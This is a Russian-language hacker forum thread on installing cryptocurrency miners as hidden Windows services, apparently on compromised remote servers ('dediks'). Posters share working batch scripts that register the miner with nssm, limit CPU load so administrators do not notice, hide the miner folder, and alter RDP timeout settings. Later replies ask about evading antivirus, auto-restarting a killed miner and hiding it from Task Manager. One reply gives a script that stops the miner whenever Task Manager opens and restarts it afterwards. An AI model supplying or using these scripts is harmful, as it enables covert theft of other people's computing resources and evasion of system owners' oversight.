Устанавливаем майнер как "службу"

Тема в разделе "Программы", создана пользователем minerd, 30 апр 2016.

Метки:
  1. minerd

    minerd Новичок

    Т.к те, кто майнит на дедиках просто запускают свой батник или .vbs скрипт, 1 вариант палевно, т.к видно окно cmd, минус второго - после рестарта его нужно будет запустить заново, сейчас я покажу как можно без особого труда установить майнер как службу
    Существует такая софтина как nssm (Non-Sucking Service Manager)
    Итак, софт должен лежать рядом с майнером(желательно), создаем батник и пишем в нем:
    Код:
    nssm install <servicename> <parameter>
    где servicename - имя сервиса
    parameter - параметры с которыми мы и запустим майнер, например:
    Код:
    nssm install myservices miner.exe -a hodl -o stratum+tcp://hodl.blockquarry.com:3032 -u user.1 -p x
    далее запускаем сервис через Win+R либо командой
    Код:
    nssm start myservices
     
    ahtss, BordaberryVinoly, веселый и ещё 1-му нравится это.
  2. minerd

    minerd Новичок

    Для более быстрой установки создал батник который устанавливает майнер как службу и соотв. запускает ее
    майнер я взял стандартный
    Скрытое содержимое:
    **Скрытое содержимое: Для просмотра Вам необходимо минимум 1 сообщений на форуме.**
    текст батника:
    Код:
    @echo off
    set SERVICE_NAME=myservices
    nssm install "%SERVICE_NAME%" myminer.exe -a hodl -o stratum+tcp://hodl.blockquarry.com:3032 -u user.worker1 -p x
    
    Set ProcessName=myminer.exe
    TaskList /FI "ImageName EQ %ProcessName%" 2>nul|Find /I "%ProcessName%">nul||(
    sc start "%SERVICE_NAME%"
    )
    exit
     
    BordaberryVinoly, Andriyan21 и admin нравится это.
  3. minerd

    minerd Новичок

    т.к руками вычислять кол-во процессов очень напряжно, предлагаю использовать такой вариант
    Код:
    set /a cpu=%NUMBER_OF_PROCESSORS%/2
    myminer.exe -a hodl -o stratum+tcp://hodl.blockquarry.com:3032 -u user.worker1 -p x -t %cpu%
    для тех кто не понял
    Код:
    set /a cpu=%NUMBER_OF_PROCESSORS%/2
    данный параметр дает возможность указать майнеру параметр "-t" так, что бы ваш майнер не грузил cpu более чем на 50% от всех возможных, я упоминал для чего это нужно в топике.

    Далее еще пара не больших правок
    Что бы скрыть содержимое папки где находится майнер используйте этот код:
    Код:
    attrib +h +r C:\путь_до_папки_с_майнером\*.*
    естественно замените путь на свой.

    У некоторых дедиков есть свойство отключаться после окончания сессии, исправить это можно так:
    Код:
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
    net accounts /forcelogoff:no
    В 90% случаев должно помочь решить проблему с отключением.

    В итоге у вас должен получится примерно такой код
    Код:
    @echo off
    set /a cpu=%NUMBER_OF_PROCESSORS%/2
    set SERVICE_NAME=myservices
    nssm install "%SERVICE_NAME%" myminer.exe -a hodl -o stratum+tcp://hodl.blockquarry.com:3032 -u user.worker1 -p x -t %cpu%
    
    Set ProcessName=myminer.exe
    TaskList /FI "ImageName EQ %ProcessName%" 2>nul|Find /I "%ProcessName%">nul||(
    sc start "%SERVICE_NAME%"
    )
    attrib +h +r C:\myminer\*.*
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
    net accounts /forcelogoff:no
    
    exit
    Если что то забыл/упустил - отпишите поправим, дополним=)
     
    skripkoff, BordaberryVinoly, Andriyan21 и ещё 1-му нравится это.
  4. minerd

    minerd Новичок

    Еще один вариант с использованием майнера cpuminer-opt
    создать рядом с ехе файл, например config.json с содержимым:
    Код:
    {
        "_comment1": "Any long-format command line argument ",
        "_comment2": "may be used in this JSON configuration file",
        "url": "stratum+tcp://hodl.usa.nicehash.com:3352",
        "user": "mybtc.worker1",
        "pass": "x",
        "algo": "hodl",
        "threads": 0,
        "cpu-priority": 5,
        "cpu-affinity": -1,
        "benchmark": false,
        "debug": false,
        "protocol": false,
        "quiet": false
    }
    заменить mybtc на ваш биткоин кошелек, если используете пул - замените stratum и соотв. название воркера и валюту
    В батнике все по старому, единственное, не нужно прописывать каких то лишник параметров вроде пула, кошелька и т.д:
    Код:
    nssm install %SERVICE_NAME% myminer.exe -c config.json
     
    Onixguru и BordaberryVinoly нравится это.
  5. Nord_vampir

    Nord_vampir Постоянный пользователь

    А можете подсказать как настроить на примере консольного майнергета службу
     
    BordaberryVinoly нравится это.
  6. Nord_vampir

    Nord_vampir Постоянный пользователь

    Сделал так но понять запустился или нет сервис не могу где посмотреть можно?
    @echo off
    set /a cpu=%NUMBER_OF_PROCESSORS%/2
    set SERVICE_NAME=cli
    nssm install "%cli%" cli.exe -user мой емаил -xmr

    Set ProcessName=cli.exe
    TaskList /FI "ImageName EQ %cli%" 2>nul|Find /I "%ProcessName%">nul||(sc start "%cli%")
    attrib +h +r C:\Users\adm\cli64*.*
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
    net accounts /forcelogoff:no


    exit
     
    BordaberryVinoly нравится это.
  7. Nord_vampir

    Nord_vampir Постоянный пользователь

    Вот что получилось но не могу понять запустился сервис или нет? майнинг на серверах (дедиках)
     
    BordaberryVinoly нравится это.
  8. minerd

    minerd Новичок

    нет, по какой то причине он выдал ошибку, возможно не хватает прав, гляньте, появился ли вообще ваш процесс в диспетчере
     
    BordaberryVinoly нравится это.
  9. Nord_vampir

    Nord_vampir Постоянный пользователь

    Нет не появился
     
  10. minerd

    minerd Новичок

    попробуйте вначале просто запустить майнер(батником), т.е обычно с окошком cmd, будет ли он работать
     
    Nord_vampir нравится это.
  11. Nord_vampir

    Nord_vampir Постоянный пользователь

    Да обычное работает и со скриптом где я скрываю окно консоли тоже работает а как служба не работает
     
  12. minerd

    minerd Новичок

    1. гляньте создалась ли вообще служба services.msc
    2. отредактируйте код а именно эти строки:
    Код:
    TaskList /FI "ImageName EQ %cli%" 2>nul|Find /I "%ProcessName%">nul||(sc start "%cli%")
    
    что бы получилось все раздельно, как в постах выше:
    Код:
    Set ProcessName=myminer.exe
    TaskList /FI "ImageName EQ %ProcessName%" 2>nul|Find /I "%ProcessName%">nul||(
    sc start "%SERVICE_NAME%"
    )
    attrib +h +r C:\myminer\*.*
     
    BordaberryVinoly и Nord_vampir нравится это.
  13. Nord_vampir

    Nord_vampir Постоянный пользователь

    АААА то есть надо именно так, а вот вопрос что есть вот эти переменные? ImageName ProcessName они так и должны быть или их надо называть как то?
     
    BordaberryVinoly нравится это.
  14. Nord_vampir

    Nord_vampir Постоянный пользователь

    Set ProcessName=myminer.exe
    SERVICE_NAME
    вот эти переменные я могу назвать как хочу или мне майнер переименовать именно так myminer.exe
     
    BordaberryVinoly нравится это.
  15. minerd

    minerd Новичок

    Код:
    Set ProcessName=myminer.exe
    TaskList /FI "ImageName EQ %ProcessName%" 2>nul|Find /I "%ProcessName%">nul||(
    sc start "%SERVICE_NAME%"
    )
    команда проверяет, запущен ли майнер, т.е
    %ProcessName% - название майнера, в вашем случае cli.exe, его нужно указать:
    Код:
    Set ProcessName=myminer.exe
    если же такого процесса нет, запускается служба:
    Код:
    sc start "%SERVICE_NAME%"
    вам нужно поменять лишь название процесса
    Код:
    Set ProcessName=myminer.exe
     
    BordaberryVinoly нравится это.
  16. Nord_vampir

    Nord_vampir Постоянный пользователь

    Все остальное оставлять как есть?
    и еще вопрос
    Non-Sucking Service Manager должен быть один файл по разрядности ситемы или там в архиве еще папочка есть это все должно быть в папке с майнером?
     
    BordaberryVinoly нравится это.
  17. minerd

    minerd Новичок

    да, оставляйте как есть.
    нет, там 2 файла, я не гружу майнер на win x32, хотя они и не попадаются мне.
     
    BordaberryVinoly нравится это.
  18. Nord_vampir

    Nord_vampir Постоянный пользователь

    вот что в архиве с nssm
    nssm
    что именно надо ложить в папку с майнером?
     
    BordaberryVinoly нравится это.
  19. minerd

    minerd Новичок

    1 папка - исходный код
    2 и 3 версии софта для разных архитектур
     
    BordaberryVinoly нравится это.
  20. Nord_vampir

    Nord_vampir Постоянный пользователь

    то есть грубо говоря далжно быть вот так
    Устанавливаем майнер как службу
     
  21. minerd

    minerd Новичок

    примерно, но я говорил уже что не пользуюсь x32.
    создайте 2 разные папки с x32 майнером и x64, положите туда nssm для каждой из архитектур
     
  22. Nord_vampir

    Nord_vampir Постоянный пользователь

    я это понял моя ошибка что я не ложил папку src
     
  23. minerd

    minerd Новичок

    она и не нужна, это исходные коды
     
  24. Nord_vampir

    Nord_vampir Постоянный пользователь

    аа тогда ты говоришь два файла в папке розрядности только один файл
     
  25. minerd

    minerd Новичок

    2 папки x32 и x64 в них одна и та же программа но для разных архитектур
     
  26. Nord_vampir

    Nord_vampir Постоянный пользователь

    они обе должны быть или только файл разрядности? если майнер х64 то ифайл должен быть от туда же? и все его просто тупо кинуть в папку с майнером х64
     
  27. minerd

    minerd Новичок

    nssm должен быть либо 32 либо 64 версии, так же как и майнер, nssm для x64 не запустится на win 32, по сути, для x32 можно сделать копию майнера такую же как и x64, но файл nssm должен в ней быть соотв. как и майнер x32.
    думаю так понятнее?
     
  28. Nord_vampir

    Nord_vampir Постоянный пользователь

    да все я понял это
     
  29. DDiger

    DDiger новичок

    А есть ли возможность регулировать нагрузку на GPU? К примеру майню через genoil, а он жрет всю мощность видюхи, тем самым тормозит винду.
     
  30. oigjhf

    oigjhf новичок

    годнота...
     
  31. Ле}{а

    Ле}{а новичок

    Парни помогите, как сделать что бы майнер запускался как служба. Вот этим батником у меня запускается майнер
    cmdow @ /HID
    set worker=Comp1
    :1
    miner -a equihash -o stratum+tcp://lyra2re.eu.nicehash.com:3342 -u Тут кошелек.%worker% -p x
    goto 1
    пробовал по всякому те коды что на первой странице но какая то ошибка, прочитать не успеваю т.к командная строка закрывается оч быстро
     
  32. TrstMn

    TrstMn новичок

    Ещё бы найти майнер, который не палится касперычем для скрытого запуска.
     
  33. TrstMn

    TrstMn новичок

    Так, запустить службу мы запустили, но вы не написали, что делать, если нужно её удалить. Запускаем консоль от имени администратора и пришем sc delete %servicename% где %servicename% - название службы, которое вы ей дали.
    Осталось дописать как при создании службы задать ей описание.
     
  34. xkinghellx

    xkinghellx новичок

    Спасибо! Очень познавательно!
     
    BordaberryVinoly нравится это.
  35. hannibal

    hannibal новичок

    интересно
     
    BordaberryVinoly нравится это.
  36. darkman33

    darkman33 новичок

    Ребят кто поможет запустить майнер в скрытом режиме чтобы при завершении процессс он снова стартовал? я запуская сейчас через батник так: nheqminer.exe -u negan1.red13 -p x -t 6 ,но постоянно приходятся заходить на дедик и запускать при его остановке
     
    BordaberryVinoly нравится это.
  37. allmagg

    allmagg новичок

    Помогите мне настроить
     
    BordaberryVinoly нравится это.
  38. веселый

    веселый новичок

    а средствами windows нельзя прописать майнер как службу?
     
  39. веселый

    веселый новичок

    Прописать в службу получается только CPU майнер пробовал на Claymore CryptoNote CPU miner, а вот например ccminer-cryptonight прописать не получилось, может дело в .dll файлах которые должны находится в папке с .exe майнером
     
    BordaberryVinoly нравится это.
  40. Valbez

    Valbez новичок

    Можете из личного опыта подсказать какую крипту и каким майнером лучше добывать на дедиках?
     
    BordaberryVinoly нравится это.
  41. веселый

    веселый новичок

    Монеро сейчас выгодно добывать хоть на дедах хоть нет, я так и не нашёл норм майнер на видеокарте чтобы можно было регулировать мощьность, соответственно майнер будет тормозить систему и админ деда скорее всего установит антивирус или перекатит винду, на проце таких проблем нет но и скорость значительно ниже
     
  42. megaminer2017

    megaminer2017 новичок

    Спасибо большое!
     
    BordaberryVinoly нравится это.
  43. веселый

    веселый новичок

    Уменьшил я в конечном итоге нагрузку на видюху ccminer-cryptonight by tsiv и на проц Claymore CryptoNote CPU miner теперь майнит в пол силы
     
    BordaberryVinoly нравится это.
  44. vikukoll

    vikukoll новичок

    данные батники работать будут на всех версиях виндовс?
     
    BordaberryVinoly нравится это.
  45. vikukoll

    vikukoll новичок

    Собрал я данный майнер для NiceHash . У меня такой впрос. Как мне сделать так . что б при закрытии в диспетчере задач самого майнера, майнер автоматоматически запустился сам ? И что б открывая папку местонахождения майнера из диспетчера . показало левую папку ?


    attrib +h +r C:\путь_до_папки_с_майнером\*.* -данной командой не смог скрыть свои атрибуды в виндовс 8.1 Если есть какое нибудь решение прошу помочь. в долгу не останусь
     
  46. Nord_vampir

    Nord_vampir Постоянный пользователь

    создай файл который назови start.vbs и скопируй эти строки запускай этим файлом :) и смотри в диспетчере задач если твой майнер появился и жрет ресурсы значит все ок. :)
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run chr(34) & "start.bat" & Chr(34), 0
    Set WshShell = Nothing
     
    BordaberryVinoly нравится это.
  47. vikukoll

    vikukoll новичок

    У меня другая задача : Как мне сделать так . что б при закрытии в диспетчере задач самого майнера, майнер автоматоматически запустился сам
     
    BordaberryVinoly нравится это.
  48. Miha13223

    Miha13223 новичок

  49. siriys_black

    siriys_black новичок

    Годно
     
  50. Nord_vampir

    Nord_vampir Постоянный пользователь

    програмируй
     
  51. id_0.05

    id_0.05 Не Пользователь Проверенный

    Не уверен что на восьмерке пойдет но как вариант
    В планировщике задач указать условия запуска майнера
    Назначить учетной записи от имени которой будет производится запуск "СИСТЕМА". Нужно будет еще настроить политику безопасности учетных записей.

    Результат, не скроет процесс майнера в диспетчере, но для того чтоб его "убить" понадобятся особые полномочия

    ПС
    Неудачные эксперименты могут привести к потере полномочий пользователя в ОС, либо частичной утрате контроля над ней :)
     
    BordaberryVinoly нравится это.
  52. nicehashminer

    nicehashminer новичок

    Спасибо
     
  53. kinohund1

    kinohund1 новичок

    Скажите, какая ответственность за скрытый майнинг. Уголовная или административная?
     
  54. Crash666

    Crash666 новичок

    Спасибо
     
  55. Ariezz

    Ariezz новичок

    Спасибо, годная инфа
     
  56. hazardgsm

    hazardgsm новичок

    Предпологаю, что уголовная :D
     
  57. pia3336

    pia3336 новичок

    ребят нифига не понимаю есть дедики штук 10 живых а не понимаю о чем вы может мозг засорен)))
     
  58. Sektor

    Sektor Постоянный пользователь

    Что вы именно не понимаете опишите, пользователи форума постараются вам ответить на все интересующие вопросы
     
  59. alexmin93

    alexmin93 новичок

    А какой сечас цпу майнер на монеро самый эффективный?
     
  60. Nimogsm

    Nimogsm 123 Проверенный

    От майнергейт, с дуал майнингом с фантомом,вроде как этот прибыльный,не знаю как щя но раньше он был в топе,или от клеймора на цпу тоже дуал.
     
  61. alexmin93

    alexmin93 новичок

    А майнегрейтовский можно настроить на другой пул? Почему-то у меня на домашнем компе майнергейт с ГУИ даёт 170 хешей/сек, а клеймор и вольф выдают лишь 70. Врёт майнергейт?
     
  62. Nimogsm

    Nimogsm 123 Проверенный

    Как вариант это засекать,ставьте от майнергейта на два часа и запишите результат,и потом от клея,как вприант еще найсхеш.
     
  63. Tyrant

    Tyrant новичок

    Ребят, у вас очень интересная тема тут. Хочу научиться собирать, но, если честно, у меня все в голове перепуталось..
    Можете все по полочкам разложить?
    Нужен майнер с:
    1. Майнит Cryptonight на Minergate
    2. Делает это скрытно
    3. Скрывает файлы и летит в автозапуск
    4. ???Где взять исходник???
    5. Если первые три я примерно понимаю, то как его прописать в службы(Оооочень интересно)
    6. Как сделать сразу на 32 и 64 битные системы (Как прописать, чтобы он выбирал в зависимости от системы ту или иную)
    7. Если собирать в личное использование, то возможно ли, чтобы его не видели ХОТЯ БЫ бесплатные АВ (Аваст, Авира, АВГ, Панда)

    У меня такая история, что я потратил 3к на суперпупер скрытный майнер, который не палится ни одним АВ, а на деле его палят вообще все. Деньги не вернули, кинули. А покупал на приличном борде у админа! Теперь хочу сам вникнуть в это все и создать свой..
    Помогите, пожалуйста, кому не сложно..
     
  64. realdemon13

    realdemon13 новичок

    спасибо
     
  65. shturm

    shturm новичок

    тема на данное время актуальна?
     
  66. admin

    admin Администратор Команда форума

    Это инструкция установки майнера как скрытой службы. Почему она может быть неактуальной?
     
  67. shturm

    shturm новичок

    разобрался уже.
     
  68. hianika

    hianika новичок

    Делаю с помощью nssm службой консольный cpu майнер, настраиваю через прокси. Т.е. несколько компов работают через прокси, находящийся на выделенном для этого компе. Если интернет на нем вырубаешь, все майнеры продолжают молотить, не смотря на потерю связи. Не могу добиться, чтобы служба при отсутствии трафика не грузила проц.
     
  69. ahtss

    ahtss новичок

    Отличное пошаговое руководство, но как ограничить майнеру загрузку всех cpu и gpu до 25-75%, если кто подскажет криптой поделюсь.
     
  70. supraheli

    supraheli новичок

    Подскажите что прописать в батник чтобы майнер закрывался при открытии диспетчера задач? винда 8
     
  71. supraheli

    supraheli новичок

    при использовании половины ядер на cpu как написано в инструкции у меня всегда нагрузка ~50%
     
  72. ahtss

    ahtss новичок

    Это общая нагрузка, если человек зайдет и посмотрит на вкладку быстродействие в диспетчере, то увидит что половина ядер пашет на 100%, что вызывает подозрения. Если бы майнер от каждого ядра брал по немногу меньше палева...
     
  73. roman23region

    roman23region новичок

    А есть вариант майнер под monero с использованием CPU? Готов заплатить)
     
  74. supraheli

    supraheli новичок

    майнеров много, они почти все условно бесплатные, берут комиссию майнингом в свою пользу. лучше почитайте побольше на эту тему, чтобы случайно деньги мошенникам не отдать
     
  75. molot24041984

    molot24041984 новичок

    блин монеро ваще уже неактуально майнить у меня ферма на 20 видях раскидал на 5 мамок и процики 8 ядер пот выхлоп 5 проциков по 8 ядер каждый и за 3 месяца всего 8 монерок ладно курс помог а так бы хз когда себя процики бы окупили
     
  76. ahtss

    ahtss новичок

    ну так майни что нибудь другое что вы про зек и ефир то забыли??
     
  77. oleg1488

    oleg1488 новичок

    Нормальная такая темка!!!
     
  78. weezgo

    weezgo новичок

    Все работает.
    Спасибо!
     
  79. kernelconf

    kernelconf новичок

    Благодарю, то что искал!
    А как задать переменную в батник, чтобы не кол-во процессоров делить на 2, а L3 кеш /2, и округлять до целого?
    И может кто подскажет идею, как защитить службу от остановки? типа как у антивирусов, при попытке остановить службу - Отказано в доступе.
     
  80. 8p79ia+1eub39euc9x8g

    8p79ia+1eub39euc9x8g новичок

    Попробуем :)
     
  81. Onixguru

    Onixguru новичок

    Спасибо попробуем!
     
  82. vikukoll

    vikukoll новичок

    Подскажите как сделать скрытие майнера от диспетчера при открытии . а при закрытии диспетчера в определённое время включался .Может есть скрипты какие
     
    vicpas нравится это.
  83. vicpas

    vicpas новичок

    спасибо)
     
  84. ervirys

    ervirys новичок

    set /a cpu=%NUMBER_OF_PROCESSORS%/2 а можно ещё меньше нагрузку сделать?
     
  85. Bit788

    Bit788 новичок

    attrib +h +r C:\myminer\*.*
    НЕ ПРЯЧЕТ ПАПКУ ТАК ЧТОБ ВЫДАВАЛО ЛЕВАЕ НАПРАВЛЕНИЕ
     
  86. tancur

    tancur новичок

    Хороший мануал
     
  87. trachodil

    trachodil новичок

    У кого то есть или кто то сожет сделать самозапускатор майнера. То есть его в процессе убили, а майнер запустился через 5 минут????
     
  88. gunnersk33

    gunnersk33 новичок

    спасибо
     
  89. doperru

    doperru новичок

    Софтина работает на гуд, дедики и не в курсе чем загружен комп. Спасибо
     
  90. Gunnersk331

    Gunnersk331 новичок

    крутая сборка
     
  91. MasterPeace

    MasterPeace новичок

    А от закрытия майнера поможет?
     
  92. and

    and новичок

    поздновато, но держи батник, который закрывает майнер, когда открывается диспетчер и открывает его обратно, когда диспетчер закрыли :D
    нашёл на просторах инета

    %1@mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run """"""%~f0"""" :"",0:Close()")& exit/b ^^^^^ чтобы консоль батника моментально закрылась

    @echo off

    TIMEOUT /T 5
    Set process1=taskmgr.exe ^^^^^ процесс диспетчера вроде как
    set process2=fuck.exe ^^^^^ название майнера, который насилуем открытием/закрытием
    set start=fuck.exe ^^^^^запускаем его либо же другой батник/vbs (майнер по прежнему будет прятаться от диспетчера, если указан другой файл)

    tasklist /FI "ImageName EQ %process2%" | find /I "%process2%"
    If %errorlevel% NEQ 1 goto :ex
    :first
    TIMEOUT /T 1 ^^^^^ задержка, с которой будет прятаться сам майнер (лучше оставить)
    tasklist /FI "ImageName EQ %process1%" | find /I "%process1%"
    If %errorlevel% NEQ 0 goto :first
    taskkill /f /im %process2%
    :first
    tasklist /FI "ImageName EQ %process2%" | find /I "%process2%"
    If %errorlevel% NEQ 1 goto :first

    :go
    TIMEOUT /T 1
    tasklist /FI "ImageName EQ %process1%" | find /I "%process1%"
    If %errorlevel% NEQ 1 goto :go
    start %start%
    goto :first

    :ex ^^^^^в случае ошибки
    exit

    P.S. не забудь убарть эти штуки ^^^^ и русский текст :D
     
  93. and

    and новичок

    https://bitalk.org/threads/4261/page-5#post-149210
    с этой штукой майнер не найти в диспетчере, т.к. его там не будет вообще